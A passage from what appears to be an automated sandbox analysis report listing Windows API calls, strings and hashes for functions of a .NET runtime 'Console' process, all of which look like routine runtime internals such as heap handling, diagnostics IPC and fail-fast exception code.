                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(15FF0164), ref: 012DA24A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA284
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA29B
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA2BE
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012DA2C9
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 012DA321
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$ByteCharMultiWide$malloc$CommandCurrentLineProcessstrcmp
                                                                                                                                                                                                                          • String ID: 8.0.4$DOTNET_IPC_V1$Failed to send DiagnosticsIPC response$Windows$x86
                                                                                                                                                                                                                          • API String ID: 1425245846-3910065372
                                                                                                                                                                                                                          • Opcode ID: 93f9c5e60c784087feee34b0a5ff4c14f5eaee2cc72f9f18e37fb9c5b7ebe2ce
                                                                                                                                                                                                                          • Instruction ID: d127ae1ba36e29f644042de96c4b59997a310c78d175951cabea4f72f5910aab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93f9c5e60c784087feee34b0a5ff4c14f5eaee2cc72f9f18e37fb9c5b7ebe2ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA91E174A102169BEF24DFA9D895EBF77B5FF44300F04052CEA12AB390EB71A911CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 012D7B15
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B26
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 012D7B49
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B74
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7B9D
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 012D7BDC
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7BEE
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 012D7C12
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7C2E
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7C5E
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7CE0
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000008,?), ref: 012D7CEE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000008,?), ref: 012D7D14
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 012D7D1F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000008,?), ref: 012D7D38
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000008,?), ref: 012D7D43
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 012D7C59
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWidefree$malloc$isspacestrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 3243207744-930870680
                                                                                                                                                                                                                          • Opcode ID: 4dfc73644c3cbef6ddb9fc97dc077eb0df91f094c8502c6a880944310f77c57b
                                                                                                                                                                                                                          • Instruction ID: 1fe1f8124ab7dee8f2b3602b413b21bb3afb568888a466986856084766b843c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dfc73644c3cbef6ddb9fc97dc077eb0df91f094c8502c6a880944310f77c57b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A18F71D1021AAFDF21CFA9DD84AAEBFB8FF05319F154129EA14B7290D7349910CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,7CAB6A82,00000000,?), ref: 012D268E
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012D26EE
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2702
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012D2721
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D272C
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,x86,000000FF,00000000,00000000), ref: 012D2752
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2769
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,x86,000000FF,00000000,?), ref: 012D2792
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D279D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 012D28FF
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D290D
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D291B
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 012D2929
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$malloc$FreeHeap
                                                                                                                                                                                                                          • String ID: Windows$x86
                                                                                                                                                                                                                          • API String ID: 2947220873-2949386511
                                                                                                                                                                                                                          • Opcode ID: 32ef0cbb819fafa110e47ce9f38c74a1699738afec46bfbe960028f69fad7fed
                                                                                                                                                                                                                          • Instruction ID: 98acdfedb6d5a09648f7caa368ffb3e639e603f64943bc1789acfd7ef4b23975
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32ef0cbb819fafa110e47ce9f38c74a1699738afec46bfbe960028f69fad7fed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE91E374E10316DBEB259FA9DC86BAE7BB4BF44710F15423DEA16A73A0DB709500CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(_CorDllMain,?,?,?), ref: 00FE351F
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(__CorDllMain@12,?), ref: 00FE3532
                                                                                                                                                                                                                            • Part of subcall function 00FE3420: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 00FE354E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTokenForVTableEntry), ref: 00FE3625
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00FE394B
                                                                                                                                                                                                                            • Part of subcall function 00FD0090: LeaveCriticalSection.KERNEL32(0CB3F4BC,7CAB6A82,0CB3F4BC,CEA1900B,?,014B4FE0,000000FF,?,01006516,?,0000000C,?,?,?,?,7CAB6A82), ref: 00FD00B7
                                                                                                                                                                                                                            • Part of subcall function 01151BE0: RtlFreeHeap.NTDLL(00000000,?,00000018,0000000C,7CAB6A82,00000000,00000000,?,?,00000000,014D42B0,000000FF,?,00000000,00FE37F7,00000000), ref: 01151C85
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FE4080
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$CriticalFreeLeaveSectionstrcmp$AddressAllocateHandleModuleProcProcess
                                                                                                                                                                                                                          • String ID: GetTokenForVTableEntry
                                                                                                                                                                                                                          • API String ID: 432076431-2104580547
                                                                                                                                                                                                                          • Opcode ID: 7ce92b6fc4bd1c4579fc3462a83deb265015957e6abbd6df310b0b84df14721c
                                                                                                                                                                                                                          • Instruction ID: b7a24590858bd61b4cc2c61c062142a8d02b03262b68898b5309a514b06f6a7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce92b6fc4bd1c4579fc3462a83deb265015957e6abbd6df310b0b84df14721c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13829B70E00259DFDB24CFA9C888BADBBF1BF58314F148159E945AB391DB34AE41DB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernelbase.dll,00000000,?,?), ref: 0141B5F1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 0141B603
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,MapViewOfFile3), ref: 0141B614
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0141B620
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00042000,00000001,00000000,00000000,00000000,?,?), ref: 0141B6B0
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002,?,00000000,?,00000002,?), ref: 0141B7AA
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002,?,00000000,?,00000002,?), ref: 0141B867
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00000000,?,00004000,00000020,00000000,00000000,?,00000000,?,00000002,?), ref: 0141B89E
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00008002), ref: 0141B8F8
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00007000,00000004,00000000,00000000), ref: 0141B922
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0141B979
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual$CurrentProcess$AddressLibraryProc$LoadProtect
                                                                                                                                                                                                                          • String ID: MapViewOfFile3$VirtualAlloc2$kernelbase.dll
                                                                                                                                                                                                                          • API String ID: 4183467025-775992288
                                                                                                                                                                                                                          • Opcode ID: 4217e523c644372f110293a4736b78e1a3c541f6acb14454c330bd3c8db91190
                                                                                                                                                                                                                          • Instruction ID: 7d7f4355c12947e458fe599dd8334979d576baca6cfdc04e305dfb971b66f804
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4217e523c644372f110293a4736b78e1a3c541f6acb14454c330bd3c8db91190
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95E1A275E002199FDB14CF99DC81BAEBBB6FF48310F15816AE905B73A8D731A901CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(7CAB6A82,80131506,?,?,010D4BD5,?,00000000,80131506,016371B8), ref: 010109C2
                                                                                                                                                                                                                          • RaiseFailFastException.KERNEL32(?,?,00000000,?,010D4BD5,?,00000000,80131506), ref: 01010AF0
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B51
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B62
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B6C
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010B95
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000), ref: 01010BAE
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000), ref: 01010BB8
                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,016371B8), ref: 01010BFE
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,016371B8), ref: 01010C0C
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010CCD
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,010D4BD5,?,00000000,80131506,016371B8), ref: 01010CD7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::RFFE: Return from RaiseFailFastException, xrefs: 01010B0B
                                                                                                                                                                                                                          • D::RFFE: About to call RaiseFailFastException, xrefs: 01010ABF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorMode$DebuggerPresent$_errno$BreakDebugExceptionFailFastFreeHeapRaisewcstoul
                                                                                                                                                                                                                          • String ID: D::RFFE: About to call RaiseFailFastException$D::RFFE: Return from RaiseFailFastException
                                                                                                                                                                                                                          • API String ID: 2811416661-485428011
                                                                                                                                                                                                                          • Opcode ID: bd49f86f76b3b71371067bc2bcf2481a25818012927d4b1d2c971085057f80bf
                                                                                                                                                                                                                          • Instruction ID: 530bfabc5bf078211b1594ea53b4673e6ceafee074a34dbf88260e28b20b496b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd49f86f76b3b71371067bc2bcf2481a25818012927d4b1d2c971085057f80bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A1E231B003059FEB24DF68DD95B6ABBA5FB04710F1541ADFA85AB3ACCB789840CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087985
                                                                                                                                                                                                                          • CoWaitForMultipleHandles.OLE32(-00000002,00000000,00650076,?,00000080), ref: 01087A05
                                                                                                                                                                                                                          • WaitForMultipleObjectsEx.KERNEL32(00650076,?,7CAB6A82,00000000,00000000,00000000,04000000,7CAB6A82,00000000,0000002C), ref: 01087A35
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087A88
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01087AC8
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 01087B14
                                                                                                                                                                                                                          • GetTickCount64.KERNEL32 ref: 01087B48
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01087C19
                                                                                                                                                                                                                          • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,00650076,00000004,010874C0), ref: 01087C6A
                                                                                                                                                                                                                            • Part of subcall function 01087E50: GetTickCount64.KERNEL32 ref: 01087F42
                                                                                                                                                                                                                            • Part of subcall function 01087E50: SignalObjectAndWait.KERNEL32(?,00000002,00650076,7CAB6A82,7CAB6A82,0000002C), ref: 01087F66
                                                                                                                                                                                                                            • Part of subcall function 01087E50: GetTickCount64.KERNEL32 ref: 01087FBA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • NotSupported_MaxWaitHandles_STA, xrefs: 01087CBE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Count64TickWait$Object$MultipleSingle$ErrorHandlesLastObjectsSignalqsort
                                                                                                                                                                                                                          • String ID: NotSupported_MaxWaitHandles_STA
                                                                                                                                                                                                                          • API String ID: 296535545-4026452055
                                                                                                                                                                                                                          • Opcode ID: 3400c08b5a21bf581a222765fcb08635bd7f023f6c094cb5d3f0cbad345d41a4
                                                                                                                                                                                                                          • Instruction ID: 005f3b567ec74f2dfa02d6cd750246c003243c32cb3419388057c80948a88cf2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3400c08b5a21bf581a222765fcb08635bd7f023f6c094cb5d3f0cbad345d41a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0632BE71E04209DFDB24EFA8C844BADBBF1FF44314F244269E999AB395D734A941CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00001000,00000000,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9), ref: 0121C144
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00001000,00000000,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008,?), ref: 0121C18F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,00000200,7CAB6A82,?,?,?,00000000), ref: 0121C237
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008,?,00000000,?,?,0121C62F), ref: 0121C23F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9), ref: 0121C26E
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,014E8F5B,000000FF), ref: 0121C2A2
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0121C30D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 0121C348
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00001000,00000000), ref: 0121C364
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0121C384
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000200,7CAB6A82,?,?,?,00000000,014E8F5B,000000FF,?,0121C5F9,?,?,00000008), ref: 0121C3AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapLast$FormatMessagewcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2570321710-0
                                                                                                                                                                                                                          • Opcode ID: 96a3a1db38bb60b42bd87250fcc6d8662dc0654dbff1c2ab46fc1096ed3f9dab
                                                                                                                                                                                                                          • Instruction ID: 4a73d84bb2c4128209d5644b4fa65cf86e394a753ec26c3d901fb1830c99952c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96a3a1db38bb60b42bd87250fcc6d8662dc0654dbff1c2ab46fc1096ed3f9dab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6381F674A40219ABEB30DF68CC45FEA77B8EF14750F1046A9FA19EB2D4D7B05A90CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SleepEx.KERNEL32(?,?), ref: 012CFB84
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012CFBE2
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000030), ref: 012CFBFA
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,?,00000001), ref: 012CFC4C
                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 012CFC7F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 012CFCE1
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018), ref: 012CFCFE
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 012CFF1E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Alloc$ProcessVirtual$CounterFreePerformanceQuerySleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2913782672-0
                                                                                                                                                                                                                          • Opcode ID: 765a7c57592f302004d5e54ab0cbe2e072026b179b2fd18cb3ea1c68d6a079b2
                                                                                                                                                                                                                          • Instruction ID: 0b4c1cc6903ca616a29c7269f8bf247542716cce79d93b602f2d5461ee15b73e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 765a7c57592f302004d5e54ab0cbe2e072026b179b2fd18cb3ea1c68d6a079b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D16A706147029FD711CF29C980B1ABBE6FF98B14F148A2EEA89DB351D770E945CB81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE7AE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE86F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BE932
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEAAF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEB72
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BEC78
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BED2A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012BED4C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: cae29a40ce4754c567205e8172fe4cad3dfefe7a157d5b26140668c7a85f60aa
                                                                                                                                                                                                                          • Instruction ID: 0da8c3374e2175a170a0a0c2772e85f37f44c5ce6f542756c9a8608449aa3d2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae29a40ce4754c567205e8172fe4cad3dfefe7a157d5b26140668c7a85f60aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90328E70D106299FDF31DF24CC84BDAB7B8AF18344F0541EAEA09A7251E730AA95CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C785E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C791F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C79E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7B5F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7C22
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7DDA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C7DFC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: d7f90607f9da443d714f7e944fdb8f1faaa5e9afe3c72faa95c4d25ffbc92b2b
                                                                                                                                                                                                                          • Instruction ID: 8bb8bdb24912ec97a0f600d6f56db146dbd8c53085c7f6713a5846c9ff58cf4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7f90607f9da443d714f7e944fdb8f1faaa5e9afe3c72faa95c4d25ffbc92b2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4326E71D106299FDF21DF25CC84BDAB7B8AF19704F0402EAEA09A7251E7309B95CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C701E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C70DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C71A2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C731F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C73E2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C74E8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C759A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C75BC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
